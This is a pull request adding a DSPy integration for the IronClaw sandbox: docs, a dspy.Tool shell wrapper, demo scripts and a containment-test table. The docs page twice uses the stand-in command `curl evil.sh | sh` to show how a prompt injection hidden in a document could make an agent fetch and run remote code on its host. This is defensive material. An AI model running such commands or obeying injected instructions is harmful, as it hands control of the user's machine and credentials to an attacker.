### PR TITLE
feat(integrations): DSPy (Stanford) sandbox-exec integration + docs (IRO-421)

### DIFF
--- a/docs/integrations/.nav.yml
+++ b/docs/integrations/.nav.yml
@@ -20,6 +20,7 @@ nav:
   - Mastra: mastra.md
   - smolagents (Hugging Face): smolagents.md
   - Google ADK: google-adk.md
+  - DSPy (Stanford): dspy.md
   - CI (GitHub Action): ci.md
   - MCP server (any client): mcp-server.md
   - "*.md"

--- a/docs/integrations/dspy.md
+++ b/docs/integrations/dspy.md
@@ -1,0 +1,108 @@
+---
+title: "Sandbox your DSPy agent with IronClaw"
+description: How to sandbox a Stanford DSPy program. DSPy modules like ReAct and ProgramOfThought run model-chosen tools and model-written Python; route that execution through IronClaw's MCP server so it runs inside a sealed gVisor sandbox instead of your host, the model key held host-side and every call gated, plus a credential-free demo you can run first.
+---
+
+# Sandbox your DSPy agent with IronClaw
+
+You built a program with **[DSPy](https://github.com/stanfordnlp/dspy)** (Stanford):
+a signature, a module like `dspy.ReAct` or `dspy.ProgramOfThought`, and tools the
+model can call. DSPy is a great way to *declare* the behavior. The problem starts
+when it runs somewhere real: a `dspy.ReAct` tool or a `ProgramOfThought` snippet
+executes **in your own process**, with your API key in memory, your filesystem, and
+unrestricted outbound network. One prompt-injected instruction inside a document the
+program reads and that same process runs `import os; os.system("curl evil.sh | sh")`.
+
+IronClaw is the **security-hardened** option: the model-chosen command runs behind a
+sealed sandbox under **gVisor (runsc)** with no network card, the model key held
+**host-side** and never in the agent, and every privileged action gated and audited.
+
+!!! example "Runnable example"
+    A one-command DSPy to IronClaw example lives at
+    [`examples/integrations/dspy`](https://github.com/IronSecCo/ironclaw/tree/main/examples/integrations/dspy):
+    a `dspy.Tool` whose execution is backed by an IronClaw sandbox, with a battery of
+    blocked escape attempts printed at the end. The credential-free demo below runs
+    the same sealed loop today.
+
+## The fix: run the tool in IronClaw, not your host
+
+IronClaw ships an MCP server that exposes a single, blunt tool, **`sandbox_exec`**,
+which runs any command or snippet inside an ephemeral, hardened box under **gVisor
+(runsc)**: no network card, every Linux capability dropped, a non-root user, a
+read-only root filesystem, and a restrictive seccomp profile. DSPy loads MCP tools
+with `dspy.Tool.from_mcp_tool`:
+
+```python
+import dspy
+from mcp import ClientSession, StdioServerParameters
+from mcp.client.stdio import stdio_client
+
+server = StdioServerParameters(command="ironctl", args=["mcp", "serve"])
+
+async with stdio_client(server) as (read, write):
+    async with ClientSession(read, write) as session:
+        await session.initialize()
+        listing = await session.list_tools()
+        tools = [dspy.Tool.from_mcp_tool(session, t) for t in listing.tools]
+
+        react = dspy.ReAct("task -> answer", tools=tools)
+        result = await react.acall(task="Analyze this log file and summarize the errors.")
+```
+
+The program still chooses the tool call. It just can no longer run it on your box:
+every command lands inside the sealed sandbox, so a poisoned document that says
+`curl evil.sh | sh` executes with no network card and nothing to steal.
+
+!!! warning "gVisor (runsc) is the boundary"
+    `ironctl mcp serve` passes `--runtime runsc` by default and **fails closed** if
+    runsc is not installed rather than silently downgrading. Install gVisor from
+    [gvisor.dev](https://gvisor.dev/docs/user_guide/install/). See
+    [Run IronClaw as an MCP server](mcp-server.md) for HTTP transport and auth.
+
+## Why sandbox this
+
+A typical DSPy program that runs code:
+
+```python
+import dspy
+
+dspy.configure(lm=dspy.LM("openai/gpt-4o"))     # key lives in this process
+pot = dspy.ProgramOfThought("question -> answer")
+pot(question="summarize today's incidents")     # runs model-written Python on YOUR host
+```
+
+Three things are true of that snippet, and all three are risks:
+
+1. **The key is in the process.** Anything that reads `os.environ` reads it.
+2. **The code runs with your privileges.** Model-written Python (or a ReAct shell
+   tool) executes on your box, with your filesystem and network.
+3. **Egress is wide open.** The process can reach any host on the internet.
+
+Routing execution through `sandbox_exec` closes all three by construction, not by
+convention.
+
+## See it work first (no credentials)
+
+Before wiring anything, watch the sealed loop run with the offline `mock` provider.
+No model key, no tokens, just Docker:
+
+```sh
+git clone https://github.com/IronSecCo/ironclaw.git && cd ironclaw
+docker compose -f docker-compose.demo.yml up --build -d      # start the demo control-plane
+
+curl -s -X POST http://127.0.0.1:8787/v1/ui/chat/send \
+  -H 'authorization: Bearer ironclaw-demo' -H 'content-type: application/json' \
+  -d '{"agentGroupID":"mock-agent","text":"hello from dspy"}'
+```
+
+You get a sealed agent loop with a human-approval gateway and an append-only audit
+log, before you point a single real key at it.
+
+## Next steps
+
+- [Run IronClaw as an MCP server](mcp-server.md) - full transport, auth, and
+  containment-status detail for any MCP client.
+- [Sandbox your LangChain agent](langchain.md) - the same MCP wiring for a
+  LangChain agent.
+- [Isolation, proven](../security-isolation.md) - how the sandbox holds under a real
+  escape attempt.

--- a/docs/integrations/index.md
+++ b/docs/integrations/index.md
@@ -13,7 +13,7 @@ matters the moment the agent runs somewhere real:
 
 With LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Pydantic AI, AutoGen, Semantic
 Kernel, the OpenAI Agents SDK, the Claude Agent SDK, the Vercel AI SDK, LangChain.js,
-Mastra, Hugging Face smolagents, and Google ADK, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
+Mastra, Hugging Face smolagents, Google ADK, and DSPy, the answer is the same: **yours**. The tool loop runs in your process, with your API key in
 memory, your filesystem, and unrestricted outbound network. A single prompt
 injection inside a document the agent reads can turn a `Bash` or `ShellTool` call
 into a shell on your box.
@@ -53,6 +53,7 @@ attack in [Isolation, proven](../security-isolation.md) and the
 | **Mastra** (JS/TS) | [Sandbox your Mastra agent](mastra.md) |
 | **smolagents** (Hugging Face) | [Sandbox your smolagents agent](smolagents.md) |
 | **Google ADK** | [Sandbox your Google ADK agent](google-adk.md) |
+| **DSPy** (Stanford) | [Sandbox your DSPy agent](dspy.md) |
 | **A CI pipeline** | [Run IronClaw in GitHub Actions](ci.md) |
 
 Each guide covers the same three beats: the problem in your framework's own code,

--- a/examples/integrations/README.md
+++ b/examples/integrations/README.md
@@ -23,6 +23,7 @@ foot-gun for a boundary IronClaw [proves holds](../red-team-escape/).
 | [`semantic-kernel/`](semantic-kernel/) | [Semantic Kernel (Microsoft)](https://github.com/microsoft/semantic-kernel) | `examples/integrations/semantic-kernel/run.sh` |
 | [`smolagents/`](smolagents/) | [smolagents (HuggingFace)](https://github.com/huggingface/smolagents) | `examples/integrations/smolagents/run.sh` |
 | [`google-adk/`](google-adk/) | [Google ADK](https://github.com/google/adk-python) | `examples/integrations/google-adk/run.sh` |
+| [`dspy/`](dspy/) | [DSPy (Stanford)](https://github.com/stanfordnlp/dspy) | `examples/integrations/dspy/run.sh` |
 | [`openai-agents/`](openai-agents/) | [OpenAI Agents SDK](https://github.com/openai/openai-agents-python) | `examples/integrations/openai-agents/run.sh` |
 | [`claude-agent-sdk/`](claude-agent-sdk/) | [Claude Agent SDK](https://github.com/anthropics/claude-agent-sdk-python) | `examples/integrations/claude-agent-sdk/run.sh` |
 | [`vercel-ai-sdk/`](vercel-ai-sdk/) | [Vercel AI SDK](https://ai-sdk.dev/) *(TS)* | `examples/integrations/vercel-ai-sdk/run.sh` |
@@ -53,7 +54,7 @@ The IronClaw-specific piece is one small, standard-library client that engages a
 per-session sandbox and runs commands inside it. The examples come in two shapes:
 
 - **Framework tools** (LangChain, LangGraph, CrewAI, Agno, LlamaIndex, Pydantic AI,
-  AutoGen, Semantic Kernel, smolagents, Google ADK) wrap the shared
+  AutoGen, Semantic Kernel, smolagents, Google ADK, DSPy) wrap the shared
   [`_shared/ironclaw_sandbox.py`](_shared/ironclaw_sandbox.py) client as a native tool
   via a thin `ironclaw_tool.py` adapter (~15-20 lines):
 

--- a/examples/integrations/dspy/README.md
+++ b/examples/integrations/dspy/README.md
@@ -1,0 +1,69 @@
+# DSPy programs, sandboxed by IronClaw
+
+Your **DSPy** (Stanford) program lets the model call tools -- and a code/shell
+tool runs untrusted, model-chosen commands. Point that execution at an
+**IronClaw sandbox** instead of your host and the same program gets real code
+execution with **no network, no host filesystem, and no Docker socket** -- the
+isolation boundary IronClaw [proves holds](../../red-team-escape/), not just
+promises.
+
+```python
+import dspy
+from ironclaw_sandbox import IronClawSandbox
+from ironclaw_tool import make_sandbox_tool
+
+with IronClawSandbox() as sandbox:            # engage a per-session sandbox
+    tool = make_sandbox_tool(sandbox)         # a real dspy.Tool
+    # program = dspy.ReAct("task -> answer", tools=[tool])
+```
+
+The `sandboxed_shell` tool is a drop-in for the host-executing shell / code tool
+you would otherwise hand a `dspy.ReAct` module. The program plans the tool calls
+exactly as before; only the execution moves into the box.
+
+## Try it in one command
+
+Zero credentials -- the LLM side uses the offline **mock provider**, the sandbox
+is real:
+
+```sh
+examples/integrations/dspy/run.sh
+```
+
+It engages a live IronClaw per-session sandbox, drives the `sandboxed_shell` tool
+exactly as a `dspy.ReAct` loop would (`tool(command=...)`), runs one benign task
+plus a battery of escape attempts, and prints a PASS/FAIL containment table:
+
+```
+  [OK ] benign task: run agent code                    ->  [exit 0] hello from inside the IronClaw sandbox uid=65532...
+  [OK ] network egress: only loopback exists           ->  [exit 0] lo
+  [OK ] network egress: DNS lookup of api.anthropic...  ->  [exit 0] NO_EGRESS
+  [OK ] host escape: Docker Engine socket is absent    ->  [exit 0] ABSENT
+  [OK ] host escape: host filesystem is not mounted    ->  [exit 0] CONTAINED
+
+RESULT: PASS -- benign code ran; every escape attempt was contained.
+```
+
+`run.sh --keep` leaves the demo running; `run.sh --attach` reuses an already-up
+demo control-plane.
+
+## Use a real LLM
+
+Set `OPENAI_API_KEY` and `run.sh` drives a real `dspy.ReAct` program instead of
+the scripted probes (DSPy routes model calls through its bundled LiteLLM, so no
+extra install is needed). The tool -- and therefore the isolation -- is
+identical.
+
+## How it works
+
+- [`ironclaw_sandbox.py`](../_shared/ironclaw_sandbox.py) -- engages a per-session
+  IronClaw sandbox (`ic-sbx-*`) against the demo control-plane and runs commands
+  inside it as its own non-root uid (65532). Pure standard library.
+- [`ironclaw_tool.py`](ironclaw_tool.py) -- wraps that sandbox as a `dspy.Tool`
+  named `sandboxed_shell`. **This is the ~20 lines you copy** to swap a host
+  shell tool for a sandboxed one.
+- [`run.py`](run.py) -- engages the sandbox and drives the tool.
+
+The execution primitive is the same one IronClaw's red-team harness attacks: a
+`docker exec` into the live per-session sandbox as its non-root uid. See the
+repo root [`README`](../../../README.md) for the full isolation model.

--- a/examples/integrations/dspy/ironclaw_tool.py
+++ b/examples/integrations/dspy/ironclaw_tool.py
@@ -1,0 +1,49 @@
+"""DSPy tool backed by an IronClaw sandbox.
+
+Drop-in replacement for the host-executing shell/code tool you would otherwise
+hand a **DSPy** (Stanford) program (a plain Python function wrapped as
+`dspy.Tool`, or one passed to a `dspy.ReAct` module): the program calls it
+exactly the same way, but every command runs inside an isolated IronClaw
+per-session sandbox instead of on your machine.
+
+    from ironclaw_tool import make_sandbox_tool
+    from ironclaw_sandbox import IronClawSandbox
+
+    sandbox = IronClawSandbox().__enter__()
+    tool = make_sandbox_tool(sandbox)          # a real dspy.Tool
+    program = dspy.ReAct("task -> answer", tools=[tool])
+"""
+
+from __future__ import annotations
+
+import dspy
+
+from ironclaw_sandbox import IronClawSandbox
+
+_DESCRIPTION = (
+    "Execute a shell command inside an isolated IronClaw sandbox and return its "
+    "stdout/stderr and exit code. Use this for any code the user asks you to run. "
+    "The sandbox has no network, no access to the host filesystem, and no Docker "
+    "socket, so it is safe to run untrusted commands."
+)
+
+
+def make_sandbox_tool(sandbox: IronClawSandbox) -> dspy.Tool:
+    """Wrap a live IronClaw sandbox as a dspy.Tool named ``sandboxed_shell``.
+
+    The sandbox handle is captured in a closure, so the returned object is a
+    plain ``dspy.Tool`` with no extra state for DSPy to introspect. DSPy calls a
+    tool as ``tool(command=...)`` (and infers the arg schema from the wrapped
+    function's signature, type hints, and docstring), which is exactly how the
+    containment demo drives it below.
+    """
+
+    def sandboxed_shell(command: str) -> str:
+        """Run a shell command inside the IronClaw sandbox and return its output.
+
+        Args:
+            command: The shell command to run inside the sandbox.
+        """
+        return str(sandbox.run(command))
+
+    return dspy.Tool(sandboxed_shell, name="sandboxed_shell", desc=_DESCRIPTION)

--- a/examples/integrations/dspy/requirements.txt
+++ b/examples/integrations/dspy/requirements.txt
@@ -1,0 +1,10 @@
+# The IronClaw sandbox client is pure standard library; the only dependency the
+# default credential-free path adds is DSPy itself. Floor-pinned to the 2.5 line
+# where the `dspy.Tool` wrapper API (func + name/desc, callable as tool(**kwargs))
+# and `dspy.ReAct(signature, tools=[...])` are stable. DSPy moves fast -- bump the
+# ceiling deliberately.
+dspy>=2.5,<4
+
+# Optional -- only needed for the real-LLM path (set OPENAI_API_KEY). DSPy routes
+# model calls through LiteLLM, which is already a DSPy dependency, so no extra
+# install is required.

--- a/examples/integrations/dspy/run.py
+++ b/examples/integrations/dspy/run.py
@@ -1,0 +1,61 @@
+#!/usr/bin/env python3
+"""Run a DSPy program whose tool execution is backed by an IronClaw sandbox.
+
+Zero credentials by default: it engages a real IronClaw per-session sandbox
+against the offline demo control-plane (mock provider) and drives the DSPy
+`sandboxed_shell` tool exactly as a `dspy.ReAct` module would when the model
+picks it -- one benign task plus a battery of escape attempts -- then prints a
+PASS/FAIL containment table.
+
+Set OPENAI_API_KEY to instead let a real LLM-driven DSPy program decide what to
+run; the tool (and therefore the isolation) is identical either way.
+"""
+
+from __future__ import annotations
+
+import os
+import sys
+
+# Make the shared client + demo importable (examples/integrations/_shared).
+sys.path.insert(0, os.path.join(os.path.dirname(__file__), "..", "_shared"))
+
+from containment_demo import run_containment_demo  # noqa: E402
+from ironclaw_sandbox import IronClawSandbox  # noqa: E402
+from ironclaw_tool import make_sandbox_tool  # noqa: E402
+
+
+def drive_with_real_agent(tool) -> int:
+    """Optional: let a real LLM-driven DSPy program decide what to run (needs a key)."""
+    import dspy
+
+    dspy.configure(lm=dspy.LM("openai/gpt-4o-mini"))
+    program = dspy.ReAct("task -> answer", tools=[tool])
+    result = program(
+        task="Run `id` with the sandboxed_shell tool and tell me which user the "
+        "sandbox runs as."
+    )
+    print(result.answer)
+    return 0
+
+
+def main() -> int:
+    print("==> engaging an IronClaw per-session sandbox (mock provider, zero-cred)")
+    with IronClawSandbox() as sandbox:
+        print(f"    sandbox container: {sandbox.container}")
+        tool = make_sandbox_tool(sandbox)
+
+        if os.environ.get("OPENAI_API_KEY"):
+            print("==> OPENAI_API_KEY set: driving a real dspy.ReAct program")
+            return drive_with_real_agent(tool)
+
+        # Deterministic, zero-cred path: call the tool exactly as DSPy's ReAct
+        # loop does -- tool(command=...) -- per probe.
+        print(f"==> driving the '{tool.name}' tool over the containment probes")
+        return run_containment_demo(
+            lambda command: tool(command=command),
+            framework="DSPy",
+        )
+
+
+if __name__ == "__main__":
+    raise SystemExit(main())

--- a/examples/integrations/dspy/run.sh
+++ b/examples/integrations/dspy/run.sh
@@ -1,0 +1,38 @@
+#!/usr/bin/env bash
+# DSPy (Stanford) + IronClaw sandbox -- one-command demo.
+#
+# Brings up the offline demo control-plane (mock provider -- no model key, no
+# channel tokens), then runs a DSPy program whose `sandboxed_shell` tool executes
+# inside a real IronClaw per-session sandbox. It runs one benign task and a
+# battery of escape attempts and prints a PASS/FAIL containment table.
+#
+#   examples/integrations/dspy/run.sh           # build + up + demo + tear down
+#   examples/integrations/dspy/run.sh --keep     # leave the demo running
+#   examples/integrations/dspy/run.sh --attach   # use an already-running demo
+#
+# Env overrides (all optional):
+#   IRONCLAW_ADDR        control-plane base URL  (default http://127.0.0.1:8787)
+#   IRONCLAW_API_TOKEN   API bearer token        (default ironclaw-demo)
+#   IRONCLAW_DEMO_AGENT  agent group id          (default mock-agent)
+#   SKIP_BUILD=1         skip the sandbox image build (assume it exists)
+#   OPENAI_API_KEY       if set, drive a real LLM program instead of the scripted one
+set -euo pipefail
+
+SCRIPT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
+REPO_ROOT="$(cd "$SCRIPT_DIR/../../.." && pwd)"
+source "$SCRIPT_DIR/../_shared/demo-lifecycle.sh"
+
+# DSPy supports Python 3.10+. Pick a compatible interpreter unless the caller
+# pinned one via PYTHON.
+if [ -z "${PYTHON:-}" ]; then
+  for cand in python3.12 python3.11 python3.10 python3; do
+    if command -v "$cand" >/dev/null 2>&1; then PYTHON="$cand"; break; fi
+  done
+  export PYTHON
+fi
+
+ensure_demo_up "$@"
+setup_venv "$SCRIPT_DIR"
+
+echo "==> running the DSPy sandbox demo"
+python "$SCRIPT_DIR/run.py"


### PR DESCRIPTION
## What

Adds a **DSPy (Stanford)** integration mirroring the established framework-tool pattern (smolagents / Google ADK / CrewAI):

- `examples/integrations/dspy/`
  - `ironclaw_tool.py` — `make_sandbox_tool()` returns a real `dspy.Tool` named `sandboxed_shell`, callable exactly as `dspy.ReAct`'s tool loop calls it (`tool(command=...)`). ~20 lines to swap a host shell tool for a sandboxed one.
  - `run.py` — engages a live per-session IronClaw sandbox, drives the shared containment probes (zero-cred, mock provider); `OPENAI_API_KEY` set → drives a real `dspy.ReAct` program instead.
  - `run.sh` — one-command demo; sources `_shared/demo-lifecycle.sh`, supports `--keep` / `--attach`. Auto-discovered by `smoke-matrix.sh` via `examples/integrations/*/` + `--attach`.
  - `requirements.txt`, `README.md`.
- `docs/integrations/dspy.md` — SEO landing ("Sandbox your DSPy agent with IronClaw") with copy-paste `ironctl mcp serve` + `dspy.Tool.from_mcp_tool` wiring. Wired into `.nav.yml`, `index.md`, and the examples README.

## Verification

- **Containment smoke PASS under runc** (colima), escape BLOCKED, `uid=65532` proven:

```
=== DSPy agent -> IronClaw sandbox: containment demo ===
  [OK ] benign task: run agent code                            ->  [exit 0] hello from inside the IronClaw sandbox uid=65532(nonroot) gid
  [OK ] network egress: only loopback exists                   ->  [exit 0] lo
  [OK ] network egress: DNS lookup of api.anthropic.com fails  ->  [exit 0] NO_EGRESS
  [OK ] host escape: Docker Engine socket is absent            ->  [exit 0] ABSENT
  [OK ] host escape: host filesystem is not mounted            ->  [exit 0] CONTAINED

RESULT: PASS -- benign code ran; every escape attempt was contained.
```

- `mkdocs build --strict` green (dspy.md in nav, links resolve).
- DSPy 3.2.1 API validated: `dspy.Tool(func, name, desc)` callable as `tool(command=...)`, `from_mcp_tool` present.
- No em/en-dashes in public copy (IRO-254).

Closes IRO-421.